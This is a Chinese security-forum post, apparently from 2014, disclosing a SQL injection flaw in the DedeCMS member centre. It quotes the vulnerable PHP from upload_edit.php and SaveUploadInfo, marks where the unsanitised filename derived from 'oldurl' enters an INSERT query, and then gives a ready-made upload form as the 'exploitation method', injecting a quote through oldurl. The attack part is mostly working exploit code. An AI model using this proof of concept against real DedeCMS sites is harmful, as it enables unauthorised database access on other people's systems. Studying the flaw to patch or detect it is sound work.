查看: 10971|回复: 0

Dedecms 会员中心注入漏洞7

[复制链接]
  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-28 03:04:56 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    <pre><code>member/upload_edit.php
    else if($dopost=='save')
    {
        $title = HtmlReplace($title,2);
        if($mediatype==1) $utype = 'image';
        else if($mediatype==2)
        {
            $utype = 'flash';
        }
        else if($mediatype==3)
        {
            $utype = 'media';
        }
        else
        {
            $utype = 'addon';
        }
        $title = HtmlReplace($title, 2);
        $exname = preg_replace("#(.*)/#", "", $oldurl);// 文件名是获取.前面的
        $exname = preg_replace("#\.(.*)$#", "", $exname);
        echo $exname ;
        $filename = MemberUploads('addonfile', $oldurl, $cfg_ml-&gt;M_ID, 
     
    $utype,$exname, -1, -1, TRUE);//返回上传的文件名
        SaveUploadInfo($title, $filename, $mediatype);//利用返回的带入查询
        ShowMsg("成功修改文件!", "uploads_edit.php?aid=$aid");
    }
     
     
     
    function SaveUploadInfo($title,$filename,$medaitype=1,$addinfos='')
    {
        global $dsql,$cfg_ml,$cfg_basedir;
        if($filename=='')
        {
            return FALSE;
        }
        if(!is_array($addinfos))
        {
            $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;
        }
        if($medaitype==1)
        {
            $info = '';
            $addinfos = GetImageSize($cfg_basedir.$filename,$info);
        }
        $addinfos[2] = @filesize($cfg_basedir.$filename);
        $row = $dsql-&gt;GetOne("SELECT aid,title,url FROM `#@__uploads` WHERE url 
     
    LIKE '$filename' AND mid='".$cfg_ml-&gt;M_ID."'; ");
        $uptime = time();
        if(is_array($row))
        {
            $query = "UPDATE `#@__uploads` SET 
     
    title='$title',mediatype='$medaitype',
                         width='{$addinfos[0]}',height='{$addinfos
     
    [1]}',filesize='{$addinfos[2]}',uptime='$uptime'
                         WHERE aid='{$row['aid']}'; ";
            $dsql-&gt;ExecuteNoneQuery($query);
        }
        else
        {
            $inquery = "INSERT INTO `#@__uploads`
     
    (title,url,mediatype,width,height,playtime,filesize,uptime,mid)
               VALUES ('$title','$filename','$medaitype','".$addinfos
     
    [0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml-
     
    &gt;M_ID."'); ";echo $inquery ;//注入就在这里发生了!
            $dsql-&gt;ExecuteNoneQuery($inquery);
        }
        $fid = $dsql-&gt;GetLastID();
        AddMyAddon($fid, $filename);
        return TRUE;
    }</code></pre>


    利用方法
    [AppleScript] 纯文本查看 复制代码
    &nbsp;
    <pre><code>&lt;form id="frmUpload" enctype="multipart/form-data"
     
    action="http://127.0.0.1/dede/member/uploads_edit.php?
     
    dopost=save&amp;title=ss&amp;oldurl=1'.php" method="post"&gt;看Oldurl就知道了~
     
     
    &lt;input type="file" name="addonfile" id="addonfile" size="50"&gt;&lt;br&gt;
    &lt;input name="mode" type="hidden" value="2"&gt;
     
    &lt;input id="btnUpload" type="submit" value="Upload"&gt;
     

    11111111111111111111111111111.jpg
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 21:25 , Processed in 0.055517 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部